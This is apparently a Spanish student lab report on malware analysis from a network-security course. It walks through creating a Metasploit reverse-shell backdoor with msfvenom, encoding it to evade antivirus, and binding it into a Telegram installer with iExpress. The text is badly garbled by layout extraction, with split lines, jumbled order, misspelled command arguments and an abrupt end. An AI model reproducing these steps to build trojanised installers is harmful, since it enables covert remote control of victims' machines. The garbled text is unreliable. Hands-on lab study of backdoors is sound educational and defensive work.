LABORATORIO DE ANALISIS DE MALWARE
Lorena Zamudio Méndez
Franklin Cesar Estévez
Nelson Morales
Raúl Zambrano
ESPECIALIZACIÓN: SEGURIDAD EN REDES DE COMPUTADORES
SENA
INTRODUCCIÓN.
En las ciencias de la informática
existen gran cantidad de adelantos
tecnológicos, así mismo, los expertos
en estas ciencias han ideado gran
cantidad artificios para realizar
actividades
buenas
dentro
de
parámetros legales como algunos
elementos con mucho talento pero
que se dejan seducir por fuerzas
oscuras.
En el siguiente informe mostraremos
que es y cómo funciona el
denominado backdoor o puerta
trasera, utilizado por los usurpadores
de sistemas o hacker para tomar
control de equipos de cómputo; desde
un equipo normal de hogar hasta una
estación de rebajo que está conectada
a
una
red
empresarial
con
seguridades.
en analizar los diferentes tipos
de datos que hay en una
máquina, y la manipulación de
estos, también incluye otras
técnicas como la recuperación
de datos perdidos que veremos
en un futuro.
Es aconsejable hacer uso de
una máquina virtual para este
tipo de análisis.
Creación BackDoor
Mostraremos el paso a paso de
cómo se crea el backdoor y el
respectivo análisis que se le
realizo para determinar si
nuestro instalador tiene un
backdoor incluido en el.
vemos la dirección ip de
nuestra víctima.
Crearemos un BackDoor con
Novalite y seguimos paso a
paso el tutorial.
Una rama de la informática a la
que
llamamos
informática
forense, esta técnica consiste
Nuestra ip del
atacante.
equipo
del
A continuación, usaremos la
aplicación msfvenom con la
cual
crearemos
nuestro
backdoor.
Msfvenom: Esta herramienta
que pertenece al framework de
Metasploit, msfvenom es la
unión
de
msfpayload
y
msfencode. msfpayload se
encarga de generar payloads
para distintas plataformas,
mientras que msfencode se
encarga de codificar dichos
payloads con el objetivo de
evadir la detección mediante el
uso de antivirus.
El comando utilizado para crear
el backdoor es el siguiente:
Msfvenom
–p
windows/metelpreter/reverce
_tcp LHOST=192.168.188.139
LPORT
=2020
–e
x86/shicata_na_gai –i 10 –f
exe > /root/Violator.exe
Ubicamos nuestro backdoor en
el sistema de archivos Root del
Ubuntu.
Lo ubicamos por carpeta
compartida en el equipo victima
Windows 7.
Como nos indica la guía de
taller, utilizamos la herramienta
iExpress 2.0 la cual nos
permitirá crear un nuevo
ejecutable donde vamos a unir
nuestro ejecutable del telegram
tsetup.1.1.23
con
nuestro
backdoor
violator.exe,
en
donde nos da como resultado
un nuevo ejecutable tsetup.
Análisis del backdoor creado.
Generamos el hash de nuestro
telegram modificado con nuestro
backdoor.
0
